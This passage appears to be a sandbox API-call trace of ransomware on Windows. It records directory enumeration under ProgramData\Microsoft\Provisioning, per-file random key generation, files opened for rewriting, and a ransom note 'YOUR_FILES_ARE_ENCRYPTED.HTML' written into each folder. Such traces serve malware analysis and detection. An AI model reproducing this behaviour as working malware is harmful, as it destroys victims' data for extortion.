lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml" [0107.106] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x6b47b0, NumberOfConcurrentThreads=0x0) returned 0x274 [0107.106] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x6b47b0, lpOverlapped=0x6b47b0) returned 1 [0107.106] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb9c845, ftCreationTime.dwHighDateTime=0x1d112b1, ftLastAccessTime.dwLowDateTime=0xeb9c845, ftLastAccessTime.dwHighDateTime=0x1d112b1, ftLastWriteTime.dwLowDateTime=0xeb9c845, ftLastWriteTime.dwHighDateTime=0x1d112b1, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0107.106] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.106] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\MasterDatastore.xml") returned 100 [0107.106] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0107.106] lstrlenW (lpString=".xml") returned 4 [0107.106] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0107.106] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0107.106] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\masterdatastore.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0107.107] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=271) returned 1 [0107.107] CloseHandle (hObject=0x31c) returned 1 [0107.107] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcd9e222, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcd9e222, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="Prov", cAlternateFileName="")) returned 1 [0107.107] StrStrIW (lpFirst="Prov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.107] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov") returned 85 [0107.107] GetProcessHeap () returned 0x600000 [0107.107] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0107.107] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov" [0107.107] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\*" [0107.107] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcd9e222, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcd9e222, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0107.108] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcd9e222, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcd9e222, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0107.108] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcd9e222, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcd9e222, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime", cAlternateFileName="")) returned 1 [0107.108] StrStrIW (lpFirst="RunTime", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.108] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime") returned 93 [0107.108] GetProcessHeap () returned 0x600000 [0107.108] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0107.109] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime" [0107.109] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\*" [0107.109] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcd9e222, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcd9e222, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName=".", cAlternateFileName="")) returned 0x626838 [0107.111] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcd9e222, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcd9e222, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="..", cAlternateFileName="")) returned 1 [0107.111] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb50367, ftCreationTime.dwHighDateTime=0x1d112b1, ftLastAccessTime.dwLowDateTime=0xeb50367, ftLastAccessTime.dwHighDateTime=0x1d112b1, ftLastWriteTime.dwLowDateTime=0xeb765cf, ftLastWriteTime.dwHighDateTime=0x1d112b1, nFileSizeHigh=0x0, nFileSizeLow=0x2a5, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1 [0107.116] StrStrIW (lpFirst="Power_0.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.116] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\Power_0.provxml") returned 109 [0107.116] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0107.116] lstrlenW (lpString=".provxml") returned 8 [0107.116] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0107.116] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb50367, ftCreationTime.dwHighDateTime=0x1d112b1, ftLastAccessTime.dwLowDateTime=0xeb50367, ftLastAccessTime.dwHighDateTime=0x1d112b1, ftLastWriteTime.dwLowDateTime=0xeb765cf, ftLastWriteTime.dwHighDateTime=0x1d112b1, nFileSizeHigh=0x0, nFileSizeLow=0x2a5, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 0 [0107.116] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0107.120] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0107.121] GetProcessHeap () returned 0x600000 [0107.121] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315c020 [0107.121] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0107.121] WriteFile (in: hFile=0x314, lpBuffer=0x315c020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x315c020*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0107.122] CloseHandle (hObject=0x314) returned 1 [0107.123] GetProcessHeap () returned 0x600000 [0107.123] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315c020 | out: hHeap=0x600000) returned 1 [0107.123] GetProcessHeap () returned 0x600000 [0107.123] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0107.124] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb9c845, ftCreationTime.dwHighDateTime=0x1d112b1, ftLastAccessTime.dwLowDateTime=0xeb9c845, ftLastAccessTime.dwHighDateTime=0x1d112b1, ftLastWriteTime.dwLowDateTime=0xeb9c845, ftLastWriteTime.dwHighDateTime=0x1d112b1, nFileSizeHigh=0x0, nFileSizeLow=0x1b2, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0107.124] StrStrIW (lpFirst="RunTime.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.124] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime.xml") returned 97 [0107.124] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0107.124] lstrlenW (lpString=".xml") returned 4 [0107.124] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0107.124] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0107.124] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x314 [0107.124] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=434) returned 1 [0107.124] CloseHandle (hObject=0x314) returned 1 [0107.124] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb9c845, ftCreationTime.dwHighDateTime=0x1d112b1, ftLastAccessTime.dwLowDateTime=0xeb9c845, ftLastAccessTime.dwHighDateTime=0x1d112b1, ftLastWriteTime.dwLowDateTime=0xeb9c845, ftLastWriteTime.dwHighDateTime=0x1d112b1, nFileSizeHigh=0x0, nFileSizeLow=0x1b2, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime.xml", cAlternateFileName="")) returned 0 [0107.124] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0107.125] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0107.125] GetProcessHeap () returned 0x600000 [0107.125] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0107.125] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0107.125] WriteFile (in: hFile=0x31c, lpBuffer=0x315b018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x315b018*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0107.126] CloseHandle (hObject=0x31c) returned 1 [0107.127] GetProcessHeap () returned 0x600000 [0107.127] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0107.127] GetProcessHeap () returned 0x600000 [0107.127] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0107.127] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcd9e222, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcd9e222, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="Prov", cAlternateFileName="")) returned 0 [0107.127] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0107.127] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 110 [0107.127] GetProcessHeap () returned 0x600000 [0107.127] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ee9d8 [0107.128] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0107.128] WriteFile (in: hFile=0x308, lpBuffer=0x6ee9d8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ee9d8*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0107.129] CloseHandle (hObject=0x308) returned 1 [0107.129] GetProcessHeap () returned 0x600000 [0107.129] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ee9d8 | out: hHeap=0x600000) returned 1 [0107.129] GetProcessHeap () returned 0x600000 [0107.129] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0107.130] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdc44d0, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="{ee4aac98-c174-4941-82b1-d121e493e4fb}", cAlternateFileName="{EE4AA~1")) returned 1 [0107.130] StrStrIW (lpFirst="{ee4aac98-c174-4941-82b1-d121e493e4fb}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.130] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}") returned 80 [0107.130] GetProcessHeap () returned 0x600000 [0107.130] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0107.131] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}" [0107.131] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*" [0107.131] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdc44d0, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName=".", cAlternateFileName="")) returned 0x626838 [0107.133] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdc44d0, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 1 [0107.133] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa18f51ef, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa18f51ef, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa18f51ef, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x71d, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="customizations.xml", cAlternateFileName="CUSTOM~1.XML")) returned 1 [0107.133] StrStrIW (lpFirst="customizations.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.133] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml") returned 99 [0107.133] PathFindExtensionW (pszPath="customizations.xml") returned=".xml" [0107.133] lstrlenW (lpString=".xml") returned 4 [0107.133] PathFindExtensionW (pszPath="customizations.xml") returned=".xml" [0107.133] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0107.133] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0107.134] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=1821) returned 1 [0107.134] GetProcessHeap () returned 0x600000 [0107.134] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3163dd0 [0107.136] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="5A") returned 2 [0107.136] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="65") returned 2 [0107.136] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="2D") returned 2 [0107.136] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="CB") returned 2 [0107.136] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="E9") returned 2 [0107.136] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="19") returned 2 [0107.136] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="F5") returned 2 [0107.136] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="07") returned 2 [0107.136] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="E7") returned 2 [0107.136] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="AA") returned 2 [0107.136] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="06") returned 2 [0107.136] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="1C") returned 2 [0107.136] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="37") returned 2 [0107.136] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="68") returned 2 [0107.136] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="86") returned 2 [0107.137] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="C4") returned 2 [0107.137] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="57") returned 2 [0107.137] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="F2") returned 2 [0107.137] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="7A") returned 2 [0107.137] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="F5") returned 2 [0107.137] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="7E") returned 2 [0107.137] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="0A") returned 2 [0107.137] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="AD") returned 2 [0107.137] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="12") returned 2 [0107.137] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="A6") returned 2 [0107.137] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="AF") returned 2 [0107.137] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="4E") returned 2 [0107.137] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="DE") returned 2 [0107.137] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="7A") returned 2 [0107.137] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="11") returned 2 [0107.137] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="10") returned 2 [0107.137] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="3D") returned 2 [0107.137] lstrcpyW (in: lpString1=0x3173e84, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml") 